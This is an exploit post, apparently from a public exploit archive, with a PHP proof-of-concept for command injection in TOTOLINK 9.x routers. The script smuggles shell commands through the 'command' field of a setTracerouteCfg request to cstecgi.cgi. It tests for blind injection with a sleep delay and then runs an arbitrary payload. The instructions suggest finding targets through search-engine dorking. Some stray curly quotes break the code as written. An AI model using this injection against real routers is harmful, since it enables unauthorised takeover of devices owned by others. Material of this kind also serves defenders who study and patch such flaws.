Headline
TOTOLINK 9.x Command Injection
TOTOLINK version 9.x suffers from a remote command injection vulnerability.
=============================================================================================================================================
| # Title : TOTOLINK 9.x Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.totolink.net/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] uses the CURL to Allow remote command .
[+] Line 71 set your target .
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php
[+] PayLoad :
<?php
class TotolinkExploit {
private $targetUri;
private $sleepTime;
public function __construct($targetUri, $sleepTime = 3) {
$this->targetUri = $targetUri;
$this->sleepTime = $sleepTime;
}
// Function to send POST request and execute the command on the target
public function executeCommand($cmd) {
$num = rand(1, 500);
$url = $this->targetUri . '/cgi-bin/cstecgi.cgi';
$data = json_encode([
"command" => "127.0.0.1; {$cmd};#",
"num" => $num,
"topicurl" => "setTracerouteCfg"
]);
// Send POST request
return $this->sendPostRequest($url, $data);
}
// Check if the target is vulnerable
public function check() {
echo "Checking if the target can be exploited.\n";
// Test using echo command to see if it's vulnerable
$response = $this->executeCommand("echo test");
if (!$response || strpos($response, 'success') === false) {
return "Target is likely not vulnerable.\n";
}
// Test command injection using sleep
echo "Performing command injection test with sleep of {$this->sleepTime} seconds.\n";
$start = microtime(true);
$this->executeCommand("sleep {$this->sleepTime}");
$elapsedTime = microtime(true) - $start;
echo "Elapsed time: " . round($elapsedTime, 2) . " seconds.\n";
if ($elapsedTime >= $this->sleepTime) {
return "Target is vulnerable: Blind command injection successful.\n";
}
return "Command injection test failed.\n";
}
// Exploit the vulnerability to run the payload
public function exploit($payload) {
echo "Executing payload on the target.\n";
$this->executeCommand($payload);
}
// Helper function to send POST requests
private function sendPostRequest($url, $postFields) {
$options = [
'http' => [
'method' => 'POST',
'header' => 'Content-Type: application/x-www-form-urlencoded',
'content' => $postFields
]
];
$context = stream_context_create($options);
return file_get_contents($url, false, $context);
}
}
// Example of usage
$targetUri = 'http://target-ip’; // Replace with actual target URL
$exploit = new TotolinkExploit($targetUri);
echo $exploit->check();
$exploit->exploit(‘whoami’); // Replace with your payload
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================